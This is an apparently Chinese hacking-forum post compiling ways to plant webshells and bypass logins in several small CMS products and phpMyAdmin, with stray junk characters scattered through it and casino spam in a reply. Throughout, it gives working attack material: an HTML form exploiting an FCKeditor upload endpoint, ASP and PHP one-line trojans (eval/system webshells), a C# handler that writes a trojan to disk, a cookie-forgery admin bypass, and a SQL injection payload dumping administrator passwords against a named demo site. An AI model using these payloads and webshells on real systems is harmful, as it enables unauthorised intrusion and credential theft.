6 N& f/ k1 R% m* [% k登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
  p8 R0 x% g4 r2 H# C7 w5 Ainurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息. b4 Z2 ~0 z( {: z
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------" B6 |  m( ~# ~: |5 T% u4 K
5 Z; n  T, R6 i8 L, I% i8 ?
YxShop易想购物商城4.7.1版本任意文件上传漏洞; }' T/ V4 `  G9 L' O* _

2 p2 k. e/ Y% ^8 S; ahttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
1 }0 c+ P3 A5 e( @/ d1 Z. x跳转到网站根目录上传任意文件。5 I3 V% W2 D$ v' H' u
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件  u5 k# P. g3 V7 V
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">: q$ c$ X+ G) ^3 Z: U3 P& L9 v
Upload a new file:<br>
7 d2 n% V2 l0 x* P<input type="file" name="NewFile" size="50"><br>
7 x; N! Y5 x8 P( A<input id="btnUpload" type="submit" value="Upload">5 X% q5 @: f3 s/ Q( i! f2 i9 C  `' K
</form>
9 s! C) m2 }9 ?7 f2 d" c8 D-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 V, Q! I4 V) O* S: ^/ L  Z5 y7 p, U
. Y. E: `( _: `- H. F! B
SDcms 后台拿webshell' V0 U+ k( v; k  V6 \9 L+ z
3 u/ Z+ V/ p# Y/ Y
第一种方法:# W: X- i1 X, y6 w
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
6 E% E3 ~2 Z) p' P/ o6 A& c. ]把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
2 _& O( c9 _) Q( h2 P' d5 o' {6 U用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
4 Y; W7 R  x; N/ _, f! z5 B第二种方法:9 J: g" a$ d. g- J; `. g1 z
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
: f6 F/ R+ i! q在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
% u6 [) ~$ b* d4 j& r+ q! `. u8 z: U第三种方法:8 ^- b: o/ |1 Z* I
进入后台-->界面管理-->模板文件管理-->创建文件1 E) R4 Y( `: e, _$ H- O4 I
文件名写入getshell.ashx6 k+ F+ E  S! l( L4 q
内容写入下面内容:
3 ?8 h7 R- O! N  K9 h/====================复制下面的=========================/
' G0 q5 u( Q+ }1 x<%@ WebHandler Language="C#" Class="Handler" %>5 d5 E1 L& t6 a% Q# a3 g0 H
using System;
$ y' S# Z# [$ \: m: i! b; rusing System.Web;; \0 o; A, ]) @- I
using System.IO;
4 _+ d" w9 \/ B# n) S3 D$ n6 |public class Handler : IHttpHandler {
. ^, ]6 C6 C9 L% K9 b/ W0 b; @public void ProcessRequest (HttpContext context) {
/ B  r6 D: A. ^* x8 Vcontext.Response.ContentType = "text/plain";
( x1 u1 m3 C7 `6 ]; M5 \7 f. UStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
  @) L7 |4 s. q! J" j: v3 ]5 rfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
( t2 p3 \. A+ B& q3 nfile1.Flush();- o6 O  y4 w7 x% p' z0 b$ ~# l$ K
file1.Close();2 T! f, T7 i, x! T
}( }: ^, L9 J# [' x
public bool IsReusable {  B! n) G# h; @
get {
1 d. D5 T7 O. }return false;
( E4 r: Y1 E8 M) z% V}  ~% a3 ~# D4 |5 t' v) U: e
}4 h( W3 G2 h) H7 z
}3 f2 g" p* B' f- @: l+ }4 A
/=============================================/
6 B$ X- U+ i2 L4 ], W访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
* f3 P( r1 b0 v& G! f会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接% T" c7 k& C: j! o7 h4 F5 A( x3 Z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 |/ s4 j  v- y- \5 z3 x. x
4 Y# N1 u, i# p' H
ESCMS网站管理系统0day5 ]7 z) D9 T) n) A) O7 n
8 w" i9 a# z$ t* R# [" h
后台登陆验证是通过admin/check.asp实现的4 b+ T) |/ b) J8 n7 |& y

2 R' D; o3 S) [4 x* \4 p! H首先我们打开http://target.com/admin/es_index.html5 w1 @+ U: E" C+ s! V: U
然后在COOKIE结尾加上& \" L, e& n7 u7 h# M3 f) |
; ESCMS$_SP2=ES_admin=st0p;# d9 U* c2 O* R2 e6 X3 ~% q: F
修改,然后刷新5 n  \- ?2 A) }" L0 N
进后台了嘎..% E) m; O: Q2 h8 ?* w
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
% v9 ?/ u% V) g# G& G  e, e; f6 _* ?4 U, l  X* R* C, d
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
  z$ a0 k+ q6 {4 H3 R/ n嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp" A8 ?4 s6 R- z4 `0 o
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..* O: i) {( H. q! J
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了' K  t- R+ `/ h) K: u
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------* ~! L2 D, e+ R) V7 q. Z  n
# k5 E% {5 h4 P) O2 L5 n
宁志网站管理系统后台无验证漏洞及修复! E' n1 U! Y+ S" x7 a
/ V% E- J" c# `# s! C
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
3 z+ r8 d0 \  F1 e: O  q) U官方网站:www.ningzhi.net* @+ ^& ]2 c" |/ q, z. I7 K3 W# ]
学校网站管理系统 V.2011版本 ' m0 [% w0 X9 d( ?; i' p% O5 @2 k
http://down.chinaz.com/soft/29943.htm 0 b: Z& P9 [4 ?. l4 c
其它版本(如:政府版等),自行下载.
* t2 l2 N& J- A漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~) S8 q# m, q: M0 E# l$ n0 M' e
login.asp代码如下:
( s* h! e/ n& N! X6 m; R<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
- D! t9 @8 S; ]( r- N5 j" g/ x( lmanage.asp代码我就不帖出来了.反正也没验证./ q" C+ r' C- x% m' l
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!" ~4 Y$ x5 x: q9 E" H
漏洞利用:
! o; G' s6 ]2 J% s直接访问http://www.0855.tv/admin/manage.asp, i% v, D' q# l( j
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
  n/ u$ Y) O3 I. W- `' B----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! R6 E+ R% ]1 m9 H; f( C. w) `9 u6 p* o" U9 ~! |1 y: t1 X. c
phpmyadmin拿shell的四种方法总结及修复8 {( s& J. I& @6 j0 a# n
7 I: U. J  o' r! m9 x- c' Q/ U
方法一:
% t+ \: E3 {0 W1 u* JCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );" u# d% q2 p/ @. I( f
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
$ G! _: m! J% }$ LSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';4 P% R. \4 T" V3 N" L8 b7 A/ b
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
* T$ O% u( [7 w! p! l0 ?    一句话连接密码:7on
8 x! c( D9 o" \  J* h$ w方法二:
$ K$ r4 D. m9 ^, r读取文件内容:    select load_file('E:/xamp/www/s.php');
3 F. S! ^+ r5 F' F. y写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
  F' g2 W: u2 o. Lcmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
0 [+ u9 i0 L" t! }  E方法三:* |* i4 W, ~2 C3 R$ Y  W# I8 i4 A* ^
JhackJ版本 PHPmyadmin拿shell& g8 G* @8 J2 Q  R
Create TABLE study (cmd text NOT NULL);8 y* s- d& X* \; C( D
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
, M3 z: Z2 N+ ]  Oselect cmd from study into outfile 'E:/wamp/www/7.php';
, \' X: b; G. G& r' U0 I0 w! TDrop TABLE IF EXISTS study;+ A3 p8 Z; Q; p* |  Z: p4 n
<?php eval($_POST[cmd])?>
! m$ L+ b& m( V" l6 d9 P/ WCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。9 t: f; j2 _& n: o
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 16 v. H' Y# e8 m8 {* Z
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
. w. G0 n+ g! ?3 N+ f2 m  h- IDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。# g2 v1 S2 {9 n( _
方法四:
. I* z* }; S8 H) d# P# f1 j* Iselect load_file('E:/xamp/www/study.php');
" Y7 {5 S1 e& \) _select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'& b3 @- f" O# P" U: |
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir1 @; }/ H, ~; o+ M  u+ u* O" T
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------  [1 t" @9 u7 i; O
2 `4 i& ]; C6 \9 S% k8 E  z
NO.001中学网站管理系统 Build 110628 注入漏洞
8 e0 ?* z- k% S4 H' y% w( C0 [- J4 W9 P- o; q
NO.001中学网站管理系统功能模块:
% P/ ]. w5 Q/ X1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等- J6 x+ c0 \9 z5 j( I  X" l+ _0 ~, C
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
( `8 |& ?; Q3 U( F' w$ C* w3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
% F3 W/ c5 @+ \% M4.视频图片管理:一级分类,动态添加视频或者图片等信息0 P1 i) [9 P5 J& f& T1 Z
5.留言管理:对留言,修改,删除、回复等管理7 g4 ~$ l8 W! e) S/ z
6.校友频道:包括校友资料excel导出、管理等功能
% o3 s5 h4 a! H% _& \7 S5 {7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
# u% q, ?) \: H5 z9 c3 G, h默认后台:admin/login.asp0 `; V/ q8 d2 L* c2 c" x
官方演示:http://demo.001cms.net6 }  C" [2 H1 t1 k* Q
源码下载地址:http://down.chinaz.com/soft/30187.htm) p# L. H4 f" s; E. C: Z+ u
EXP:, X# `* @5 R% r. `. ?% W. W6 y
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin% `2 k$ q( J/ H
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
$ H9 D! v/ [" d" Qgetshell:后台有备份,你懂的
6 R) B6 n& @# k; N! ?" W* ?另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
* s0 R* x8 Z+ ]9 u# P( f6 A% V$ w-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表